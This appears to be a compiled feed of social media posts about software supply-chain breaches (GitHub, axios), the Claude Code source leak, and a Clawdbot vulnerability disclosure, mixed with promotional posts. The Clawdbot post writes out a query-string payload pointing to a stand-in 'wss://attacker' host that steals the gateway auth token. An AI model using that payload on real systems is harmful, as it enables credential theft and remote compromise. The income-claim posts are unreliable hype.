GitHub HA SIDO HACKEDO A LO GRANDE!
Un grupo de hackers conocido como TeamPCP afirma haber infiltrado los servidores internos de GitHub y haber robado el código fuente completo de la plataforma, junto con más de 4.000 repositorios privados.
Según ellos, todo ese material sensible ya está a la venta en un foro del dark web. El precio inicial: 50.000 dólares o se lo llevan al mejor postor.
GitHub ya confirmó que está investigando un acceso no autorizado a sus repositorios internos. De momento dicen que no hay evidencia de que se haya filtrado datos de clientes, organizaciones ni repositorios públicos, pero la situación sigue en desarrollo y están monitoreando todo.
El origen del ataque parece ser una extensión maliciosa de VS Code instalada en el dispositivo de un empleado.
Un recordatorio brutal de lo vulnerable que puede ser la cadena de suministro en las grandes empresas tecnológicas.
Esto no es solo un hack más.
Es una llamada de atención para todos los que confiamos nuestro código, secretos y proyectos en plataformas centralizadas.
🚨 GitHub Hacked - Internal Source Code Repositories Compromised via Employee Device
Source: https://t.co/5gc68A17Q7
GitHub has confirmed unauthorized access to its internal repositories after detecting a compromised employee device infected through a malicious Visual Studio Code extension, the company disclosed in a series of official statements on May 20, 2026.
GitHub's investigation indicates the attacker successfully exfiltrated data from GitHub-internal repositories only, with no confirmed impact on public or customer-hosted repositories at this stage.
A notorious threat actor operating under the alias TeamPCP has claimed responsibility for the breach, alleging the exfiltration of proprietary organization data and source code.
#cybersecuritynews
GitHub just got hacked, a single VS Code extension did it.
→ Nx Console (2.2M installs) got hijacked, credential stealer hidden in an orphan commit
→ it harvested tokens from GitHub, npm, AWS, Kubernetes, even 1Password
→ a GitHub employee installed it
→ attackers accessed ~3,800 of GitHub's internal repositories
→ threat actor "TeamPCP" is now selling the stolen data on the dark web
→ the poisoned version was live for only 11 minutes before detection
→ GitHub confirmed it and spent the night rotating all critical secrets
one extension, 11 minutes. 3,800 internal repos compromised.
check your extensions right now.
We are investigating unauthorized access to GitHub’s internal repositories. While we currently have no evidence of impact to customer information stored outside of GitHub’s internal repositories (such as our customers’ enterprises, organizations, and repositories), we are closely monitoring our infrastructure for follow-on activity.
1/ We are sharing additional details regarding our investigation into unauthorized access to GitHub's internal repositories.
Yesterday we detected and contained a compromise of an employee device involving a poisoned VS Code extension. We removed the malicious extension version, isolated the endpoint, and began incident response immediately.
el ingeniero que construyó Claude Code acaba de publicar un video de 28 minutos sobre cómo escribir prompts que realmente funcionan
he visto cursos de 300$ que no cubren lo que él muestra en los primeros 10 minutos
archivos CLAUDE.md, atajos de memoria, sesiones paralelas, patrones de prompting
todo en un video y completamente gratis
funciona seas desarrollador, principiante o alguien que lleva meses usando Claude
a partir de esto preparé 18 cosas que puedes copiar y usar en Claude hoy mismo
guía completa en el artículo de abajo
Yesterday, I released a 53-page Claude prompt guide.
It reveals how busy professionals are quietly adding $10,000+/month publishing AI eBooks.
1,200 people requested it.
But I couldn’t reply to everyone, so I’m opening access again.
Inside: the exact AI prompts needed to build a $100K/year AI eBook publishing business.
Like + comment 'Guide' and I’ll share it for FREE.
Follow me to receive the DM.
⏳ Available for the next 48 hours only.
Anthropic tried to kill 8,100 GitHub repos. Then this happened
> They filed a DMCA. GitHub nuked the entire network within hours. Developers got notices for forks of Anthropic's OWN public repo - one guy's fork had zero leaked code.
> Boris Cherny, head of Claude Code, had to go on X personally: "This was not intentional. Should be better now."
> Meanwhile Sigrid Jin - who used 25 billion Claude Code tokens last year - woke up at 4AM and rewrote the entire thing in Python before sunrise. DMCA can't touch a clean-room rewrite.
> It hit 50K stars in 2 hours. Fastest repo in GitHub history.
> Today claw-code officially launched as an independent project with a formal press release. And the Rust port merged today - what started as a panic rewrite now ships release 0.1.0.
> 140K stars. 102K forks. More than Anthropic's own repo.
> 512,000 lines are in the wild forever. What started as Anthropic's biggest embarrassment just became their most dangerous competitor.
You cannot make this up.
🚨 Another major supply chain incident 🚨
axios — one of the most widely used npm packages — has been compromised. Malicious versions [email protected] and [email protected] were published and are actively dropping malware.
The attack pulls in a newly created dependency [email protected], confirmed as a malicious loader: it executes obfuscated payloads, runs shell commands, and attempts to evade detection while wiping traces.
With 100M+ weekly downloads, this is a live, large-scale supply chain attack.
More details: https://t.co/ex7L7a6hW4
Anthropic leaked 512,000 lines of Claude Code source code yesterday.
What happened in the next 12 hours is absolutely wild.
4 AM. Anthropic pushes an update to npm. Inside the package: their entire codebase. A 60 MB debugging file accidentally bundled in.
23 minutes later, researcher Chaofan Shou spots it. Downloads the zip.
Posts it on X. Within 6 hours: 3 million views.
By the time Anthropic’s team woke up, the code was forked 41,000+ times across GitHub. Anthropic started firing DMCA takedowns. Too late.
A Korean developer named Sigrid Jin woke up to his phone exploding. He’s Claude Code’s biggest power user.
WSJ reported he burned through 25 billion tokens last year.
He read the leaked code.
Rewrote the entire thing in Python in 8 hours. His repo hit 30,000 stars faster than any GitHub project in history.
Then he rewrote it again in Rust. That version now has 49,000 stars.
Someone mirrored it to a decentralized platform with one message: “will never be taken down.” The code is permanent. Anthropic cannot get it back.
Here’s the part I can’t stop thinking about: Anthropic built something called “Undercover Mode.” Its only job: prevent Claude from accidentally leaking internal secrets.
They shipped an entire anti-leak system in their own product. Then leaked their own source code in a .map file. Irony is beautiful
🚨We found RCE in Clawdbot 🚨
If you're using Clawdbot/Moltbot, I can get RCE on your computer just by getting you to click a link.
The coolest part? This vulnerability (CVE-2026-25253) took only 100 minutes to discover, and it was discovered completely autonomously using @Ethiack's AI pentesting solution "Hackian".
Here's how it went down 👇
We set Hackian against Clawdbot, purely blackbox. It discovered that the Control UI stores the gateway auth token in localStorage and builds the first WebSocket connect frame from it on load.
Hackian discovered that the UI also accepts "gatewayUrl" via query params: /chat?gatewayUrl=wss://attacker. This overrides the saved gateway and auto connects 😏
On first load, the UI immediately opens a WebSocket to the attacker URL and sends the token!
Think that's cool? Wait until you see how it upgraded this to a full RCE for local Clawdbot systems. Read the deets 👇
https://t.co/nnoOClDYx8
🚨Claude Opus 4.6 wrote vulnerable code, leading to a smart contract exploit with $1.78M loss
cbETH asset's price was set to $1.12 instead of ~$2,200. The PRs of the project show commits were co-authored by Claude - Is this the first hack of vibe-coded Solidity code?
Microsoft lanzó curso de 'MCP para Principiantes' como un repositorio en Github.
El curso cubre la creación de MCP en C#, Java, Typescript, Python y Javascript.
Además del repositorio, se organizan sesiones de transmisión en vivo para cada uno de los lenguajes de software, en inglés y otros idiomas principales hablados en todo el mundo.
🔗https://t.co/4lDLQcBcSk
SOMEONE CREATED A GITHUB REPO WITH AN ENTIRE SETUP FOR AN AI AGENCY
Engineers, designers, growth marketers, product managers.
Broken down how even a rookie could understand.
It has over 10K stars in 7 days
GitHub: https://t.co/VYdwzJuCtB